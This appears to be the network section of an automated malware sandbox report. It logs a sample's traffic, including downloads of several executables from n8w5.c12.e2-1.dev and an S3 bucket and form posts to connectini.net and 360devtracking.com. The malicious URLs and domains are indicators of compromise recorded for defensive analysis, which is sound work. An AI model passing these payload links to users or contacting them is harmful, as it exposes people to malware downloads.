Network Analysis
TCP Requests
Source | Destination | Host |
---|---|---|
192.168.56.101:49168 | 121.254.136.57:80 | apps.identrust.com |
192.168.56.101:49169 | 121.254.136.57:80 | apps.identrust.com |
192.168.56.101:49191 | 121.254.136.57:80 | apps.identrust.com |
192.168.56.101:49192 | 121.254.136.57:80 | apps.identrust.com |
192.168.56.101:49179 | 142.250.207.36:80 | www.google.com |
192.168.56.101:49188 | 192.243.59.20:443 | www.profitabletrustednetwork.com |
192.168.56.101:49189 | 192.243.59.20:443 | www.profitabletrustednetwork.com |
192.168.56.101:49165 | 216.155.20.140:443 | n8w5.c12.e2-1.dev |
192.168.56.101:49166 | 216.155.20.140:443 | n8w5.c12.e2-1.dev |
192.168.56.101:49164 | 37.230.138.123:443 | connectini.net |
192.168.56.101:49178 | 37.230.138.123:443 | connectini.net |
192.168.56.101:49180 | 37.230.138.123:443 | connectini.net |
192.168.56.101:49174 | 37.230.138.66:80 | 360devtracking.com |
192.168.56.101:49206 | 37.230.138.66:80 | 360devtracking.com |
192.168.56.101:49167 | 52.219.75.132:443 | wewewe.s3.eu-central-1.amazonaws.com |
UDP Requests
Source | Destination |
---|---|
192.168.56.101:51901 | 164.124.101.2:53 |
192.168.56.101:52753 | 164.124.101.2:53 |
192.168.56.101:52797 | 164.124.101.2:53 |
192.168.56.101:52815 | 164.124.101.2:53 |
192.168.56.101:53004 | 164.124.101.2:53 |
192.168.56.101:53850 | 164.124.101.2:53 |
192.168.56.101:54148 | 164.124.101.2:53 |
192.168.56.101:54883 | 164.124.101.2:53 |
192.168.56.101:55146 | 164.124.101.2:53 |
192.168.56.101:58297 | 164.124.101.2:53 |
192.168.56.101:59002 | 164.124.101.2:53 |
192.168.56.101:61950 | 164.124.101.2:53 |
192.168.56.101:137 | 192.168.56.255:137 |
192.168.56.101:52800 | 239.255.255.250:1900 |
192.168.56.103:137 | 192.168.56.101:137 |
HTTP Requests
POST https://connectini.net/Series/SuperNitouDisc.php (status 100)
Request:
POST /Series/SuperNitouDisc.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: connectini.net
Content-Length: 51
Expect: 100-continue
Connection: Keep-Alive
Response:
HTTP/1.1 100 Continue
GET https://wewewe.s3.eu-central-1.amazonaws.com/WeUninstalled.exe (status 0, no response recorded)
Request:
GET /WeUninstalled.exe HTTP/1.1
Host: wewewe.s3.eu-central-1.amazonaws.com
Connection: Keep-Alive
GET https://n8w5.c12.e2-1.dev/doma/Villains-Wiki/pub-LJWuMU9jpVNtx.exe (status 200)
Request:
GET /doma/Villains-Wiki/pub-LJWuMU9jpVNtx.exe HTTP/1.1
Host: n8w5.c12.e2-1.dev
Connection: Keep-Alive
Response:
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 02 Feb 2023 02:32:09 GMT
Content-Type: binary/octet-stream
Content-Length: 599552
Connection: keep-alive
Accept-Ranges: bytes
Content-Security-Policy: block-all-mixed-content
ETag: "ab0394e973175c02ee34a0322794906a"
Last-Modified: Tue, 31 Jan 2023 15:58:39 GMT
No-Gzip-Compression: true
Strict-Transport-Security: max-age=31536000; includeSubDomains
Vary: Origin
Vary: Accept-Encoding
X-Amz-Request-Id: 173FE123A6996D13
X-Content-Type-Options: nosniff
X-Minio-Compressed: s2
X-Xss-Protection: 1; mode=block
x-amz-version-id: null
GET https://n8w5.c12.e2-1.dev/doma/Villains-Wiki/hand-LJWuMU9jpVNtx.exe (status 200)
Request:
GET /doma/Villains-Wiki/hand-LJWuMU9jpVNtx.exe HTTP/1.1
Host: n8w5.c12.e2-1.dev
Connection: Keep-Alive
Response:
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 02 Feb 2023 02:32:09 GMT
Content-Type: binary/octet-stream
Content-Length: 129024
Connection: keep-alive
Accept-Ranges: bytes
Content-Security-Policy: block-all-mixed-content
ETag: "70a9b681d28137cfb4f0b4ab59ef51c6"
Last-Modified: Tue, 31 Jan 2023 15:58:32 GMT
No-Gzip-Compression: true
Strict-Transport-Security: max-age=31536000; includeSubDomains
Vary: Origin
Vary: Accept-Encoding
X-Amz-Request-Id: 173FE123A8A59DA4
X-Content-Type-Options: nosniff
X-Minio-Compressed: s2
X-Xss-Protection: 1; mode=block
x-amz-version-id: null
GET https://n8w5.c12.e2-1.dev/doma/widgets/powerOff.exe (status 200)
Request:
GET /doma/widgets/powerOff.exe HTTP/1.1
Host: n8w5.c12.e2-1.dev
Response:
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 02 Feb 2023 02:32:12 GMT
Content-Type: binary/octet-stream
Content-Length: 858837
Connection: keep-alive
Accept-Ranges: bytes
Content-Security-Policy: block-all-mixed-content
ETag: "c0538198613d60407c75c54c55e69d91"
Last-Modified: Tue, 31 Jan 2023 16:00:19 GMT
No-Gzip-Compression: true
Strict-Transport-Security: max-age=31536000; includeSubDomains
Vary: Origin
Vary: Accept-Encoding
X-Amz-Request-Id: 173FE1243B942D7B
X-Content-Type-Options: nosniff
X-Minio-Compressed: s2
X-Xss-Protection: 1; mode=block
x-amz-version-id: null
GET https://wewewe.s3.eu-central-1.amazonaws.com/WeUninstalled.exe (status 0, no response recorded)
Request:
GET /WeUninstalled.exe HTTP/1.1
Host: wewewe.s3.eu-central-1.amazonaws.com
GET https://n8w5.c12.e2-1.dev/doma/Villains-Wiki/up-do-dat-LJWuMU9jpVNtx.exe (status 200)
Request:
GET /doma/Villains-Wiki/up-do-dat-LJWuMU9jpVNtx.exe HTTP/1.1
Host: n8w5.c12.e2-1.dev
Response:
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 02 Feb 2023 02:32:13 GMT
Content-Type: binary/octet-stream
Content-Length: 479744
Connection: keep-alive
Accept-Ranges: bytes
Content-Security-Policy: block-all-mixed-content
ETag: "c4ffd52c9e7fd2fe9ce71298c36d1ec2"
Last-Modified: Tue, 31 Jan 2023 15:59:18 GMT
No-Gzip-Compression: true
Strict-Transport-Security: max-age=31536000; includeSubDomains
Vary: Origin
Vary: Accept-Encoding
X-Amz-Request-Id: 173FE12468366FA3
X-Content-Type-Options: nosniff
X-Minio-Compressed: s2
X-Xss-Protection: 1; mode=block
x-amz-version-id: null
GET https://wewewe.s3.eu-central-1.amazonaws.com/WeUninstalled.exe (status 0, no response recorded)
Request:
GET /WeUninstalled.exe HTTP/1.1
Host: wewewe.s3.eu-central-1.amazonaws.com
GET https://connectini.net/S2S/Disc/Disc.php?ezok=power2off2&tesla=8 (status 200)
Request:
GET /S2S/Disc/Disc.php?ezok=power2off2&tesla=8 HTTP/1.1
Host: connectini.net
Response:
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 02 Feb 2023 02:32:28 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.1.33
X-Powered-By: PleskLin
POST https://connectini.net/Series/Conumer2kenpachi.php (status 100)
Request:
POST /Series/Conumer2kenpachi.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: connectini.net
Content-Length: 53
Expect: 100-continue
Connection: Keep-Alive
Response:
HTTP/1.1 100 Continue
POST https://connectini.net/Series/Conumer4Publisher.php (status 100)
Request:
POST /Series/Conumer4Publisher.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: connectini.net
Cache-Control: no-store,no-cache
Pragma: no-cache
Content-Length: 53
Expect: 100-continue
Connection: Keep-Alive
Response:
HTTP/1.1 100 Continue
GET https://connectini.net/Series/publisher/1/KR.json (status 200)
Request:
GET /Series/publisher/1/KR.json HTTP/1.1
Host: connectini.net
Cache-Control: no-store,no-cache
Pragma: no-cache
Response:
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 02 Feb 2023 02:33:20 GMT
Content-Type: application/json
Content-Length: 4184
Last-Modified: Mon, 11 Apr 2022 13:54:12 GMT
Connection: keep-alive
ETag: "62543304-1058"
X-Powered-By: PleskLin
Accept-Ranges: bytes
GET https://connectini.net/Series/kenpachi/2/goodchannel/KR.json (status 200)
Request:
GET /Series/kenpachi/2/goodchannel/KR.json HTTP/1.1
Host: connectini.net
Response:
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 02 Feb 2023 02:33:36 GMT
Content-Type: application/json
Content-Length: 5420
Last-Modified: Thu, 02 Feb 2023 02:15:02 GMT
Connection: keep-alive
ETag: "63db1ca6-152c"
X-Powered-By: PleskLin
Accept-Ranges: bytes
GET https://connectini.net/Series/configPoduct/2/goodchannel.json (status 200)
Request:
GET /Series/configPoduct/2/goodchannel.json HTTP/1.1
Host: connectini.net
Response:
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 02 Feb 2023 02:33:37 GMT
Content-Type: application/json
Content-Length: 344
Connection: keep-alive
X-Accel-Version: 0.01
Last-Modified: Mon, 11 Apr 2022 13:48:37 GMT
ETag: "158-5dc613383b411"
Accept-Ranges: bytes
X-Powered-By: PleskLin
GET http://apps.identrust.com/roots/dstrootcax3.p7c (status 200)
Request:
GET /roots/dstrootcax3.p7c HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: apps.identrust.com
Response:
HTTP/1.1 200 OK
X-XSS-Protection: 1; mode=block
Strict-Transport-Security: max-age=15768000
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Content-Security-Policy: default-src 'self' *.identrust.com
Last-Modified: Fri, 20 Jan 2023 18:36:10 GMT
ETag: "37d-5f2b652c27a80"
Accept-Ranges: bytes
Content-Length: 893
X-Content-Type-Options: nosniff
X-Frame-Options: sameorigin
Content-Type: application/pkcs7-mime
Cache-Control: max-age=3600
Expires: Thu, 02 Feb 2023 03:32:09 GMT
Date: Thu, 02 Feb 2023 02:32:09 GMT
Connection: keep-alive
GET http://apps.identrust.com/roots/dstrootcax3.p7c (status 200)
Request:
GET /roots/dstrootcax3.p7c HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: apps.identrust.com
Response:
HTTP/1.1 200 OK
X-XSS-Protection: 1; mode=block
Strict-Transport-Security: max-age=15768000
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Content-Security-Policy: default-src 'self' *.identrust.com
Last-Modified: Fri, 20 Jan 2023 18:36:10 GMT
ETag: "37d-5f2b652c27a80"
Accept-Ranges: bytes
Content-Length: 893
X-Content-Type-Options: nosniff
X-Frame-Options: sameorigin
Content-Type: application/pkcs7-mime
Cache-Control: max-age=3600
Expires: Thu, 02 Feb 2023 03:32:09 GMT
Date: Thu, 02 Feb 2023 02:32:09 GMT
Connection: keep-alive
POST http://360devtracking.com/ezzcbmueaa4iwhvb/fmovies (status 100)
Request:
POST /ezzcbmueaa4iwhvb/fmovies HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 360devtracking.com
Content-Length: 180
Expect: 100-continue
Accept-Encoding: gzip
Connection: Keep-Alive
Response:
HTTP/1.1 100 Continue
GET http://www.google.com/ (status 200)
Request:
GET / HTTP/1.1
Host: www.google.com
Connection: Keep-Alive
Response:
HTTP/1.1 200 OK
Date: Thu, 02 Feb 2023 02:33:02 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=ISO-8859-1
P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
Server: gws
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
Set-Cookie: 1P_JAR=2023-02-02-02; expires=Sat, 04-Mar-2023 02:33:02 GMT; path=/; domain=.google.com; Secure
Set-Cookie: AEC=ARSKqsK14Hld-gUKjovzDcT--sqKsg7L22IawKDMMrHqr0TQej7xMVDBLA; expires=Tue, 01-Aug-2023 02:33:02 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
Set-Cookie: NID=511=Ztb9REZQAHi_gaalViPIGAiDVz-2mdWslSsl5nIrSMke03iPZ5ym6gQvjhqhrZrwQcqRjAdn75R7dZ_uP6pb51KOLyot2zUT2d9GAGW-2l3DGAG6ufYAcBqKNpmCc62khjLVofb204CsNO0C2Wb0gynlcq4uDCTBhI3GKiBW6_M; expires=Fri, 04-Aug-2023 02:33:02 GMT; path=/; domain=.google.com; HttpOnly
Accept-Ranges: none
Vary: Accept-Encoding
Transfer-Encoding: chunked
GET http://apps.identrust.com/roots/dstrootcax3.p7c (status 200)
Request:
GET /roots/dstrootcax3.p7c HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: apps.identrust.com
Response:
HTTP/1.1 200 OK
X-XSS-Protection: 1; mode=block
Strict-Transport-Security: max-age=15768000
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Content-Security-Policy: default-src 'self' *.identrust.com
Last-Modified: Fri, 20 Jan 2023 18:36:10 GMT
ETag: "37d-5f2b652c27a80"
Accept-Ranges: bytes
Content-Length: 893
X-Content-Type-Options: nosniff
X-Frame-Options: sameorigin
Content-Type: application/pkcs7-mime
Cache-Control: max-age=3600
Expires: Thu, 02 Feb 2023 03:33:27 GMT
Date: Thu, 02 Feb 2023 02:33:27 GMT
Connection: keep-alive
GET http://apps.identrust.com/roots/dstrootcax3.p7c (status 200)
Request:
GET /roots/dstrootcax3.p7c HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: apps.identrust.com
Response:
HTTP/1.1 200 OK
X-XSS-Protection: 1; mode=block
Strict-Transport-Security: max-age=15768000
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Content-Security-Policy: default-src 'self' *.identrust.com
Last-Modified: Fri, 20 Jan 2023 18:36:10 GMT
ETag: "37d-5f2b652c27a80"
Accept-Ranges: bytes
Content-Length: 893
X-Content-Type-Options: nosniff
X-Frame-Options: sameorigin
Content-Type: application/pkcs7-mime
Cache-Control: max-age=3600
Expires: Thu, 02 Feb 2023 03:33:27 GMT
Date: Thu, 02 Feb 2023 02:33:27 GMT
Connection: keep-alive
GET http://apps.identrust.com/roots/dstrootcax3.p7c (status 200)
Request:
GET /roots/dstrootcax3.p7c HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: apps.identrust.com
Response:
HTTP/1.1 200 OK
X-XSS-Protection: 1; mode=block
Strict-Transport-Security: max-age=15768000
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Content-Security-Policy: default-src 'self' *.identrust.com
Last-Modified: Fri, 20 Jan 2023 18:36:10 GMT
ETag: "37d-5f2b652c27a80"
Accept-Ranges: bytes
Content-Length: 893
X-Content-Type-Options: nosniff
X-Frame-Options: sameorigin
Content-Type: application/pkcs7-mime
Cache-Control: max-age=3600
Expires: Thu, 02 Feb 2023 03:33:27 GMT
Date: Thu, 02 Feb 2023 02:33:27 GMT
Connection: keep-alive
POST http://360devtracking.com/ezzcbmueaa4iwhvb/fmovies (status 100)
Request:
POST /ezzcbmueaa4iwhvb/fmovies HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 360devtracking.com
Content-Length: 180
Expect: 100-continue
Accept-Encoding: gzip
Connection: Keep-Alive
Response:
HTTP/1.1 100 Continue
ICMP traffic
Source | Destination | ICMP Type | Data |
---|---|---|---|
192.168.56.101 | 142.251.42.174 | 8 | \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 |
142.251.42.174 | 192.168.56.101 | 0 | \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 |
IRC traffic
No IRC requests performed.
Suricata Alerts
Suricata TLS
Flow | Issuer | Subject | Fingerprint |
---|---|---|---|
TLS 1.2 192.168.56.101:49165 216.155.20.140:443 | C=US, O=Let's Encrypt, CN=R3 | CN=*.c12.e2-1.dev | f4:2e:74:ce:19:13:4f:d4:b2:f4:6f:11:2a:21:4f:ac:1b:db:f1:48 |
TLSv1 192.168.56.101:49178 37.230.138.123:443 | C=CH, L=Schaffhausen, O=Plesk, CN=Plesk/emailAddress=info@plesk.com | C=CH, L=Schaffhausen, O=Plesk, CN=Plesk/emailAddress=info@plesk.com | a9:58:92:78:d9:50:a8:fa:c0:a9:d2:11:99:c2:6d:53:0e:1f:6d:49 |
TLSv1 192.168.56.101:49164 37.230.138.123:443 | C=CH, L=Schaffhausen, O=Plesk, CN=Plesk/emailAddress=info@plesk.com | C=CH, L=Schaffhausen, O=Plesk, CN=Plesk/emailAddress=info@plesk.com | a9:58:92:78:d9:50:a8:fa:c0:a9:d2:11:99:c2:6d:53:0e:1f:6d:49 |
TLS 1.2 192.168.56.101:49166 216.155.20.140:443 | C=US, O=Let's Encrypt, CN=R3 | CN=*.c12.e2-1.dev | f4:2e:74:ce:19:13:4f:d4:b2:f4:6f:11:2a:21:4f:ac:1b:db:f1:48 |
TLSv1 192.168.56.101:49189 192.243.59.20:443 | C=US, O=Let's Encrypt, CN=R3 | CN=profitabletrustednetwork.com | f7:40:fe:06:98:43:c6:e1:58:b9:b4:b8:6c:ec:bc:6b:d7:3a:c7:44 |
TLS 1.2 192.168.56.101:49167 52.219.75.132:443 | C=US, O=Amazon, OU=Server CA 1B, CN=Amazon | CN=*.s3.eu-central-1.amazonaws.com | bc:92:6b:62:48:5f:c5:08:60:03:a9:1e:bc:29:58:79:d7:4b:94:fb |
TLSv1 192.168.56.101:49188 192.243.59.20:443 | C=US, O=Let's Encrypt, CN=R3 | CN=profitabletrustednetwork.com | f7:40:fe:06:98:43:c6:e1:58:b9:b4:b8:6c:ec:bc:6b:d7:3a:c7:44 |
TLSv1 192.168.56.101:49180 37.230.138.123:443 | C=CH, L=Schaffhausen, O=Plesk, CN=Plesk/emailAddress=info@plesk.com | C=CH, L=Schaffhausen, O=Plesk, CN=Plesk/emailAddress=info@plesk.com | a9:58:92:78:d9:50:a8:fa:c0:a9:d2:11:99:c2:6d:53:0e:1f:6d:49 |
Snort Alerts
No Snort Alerts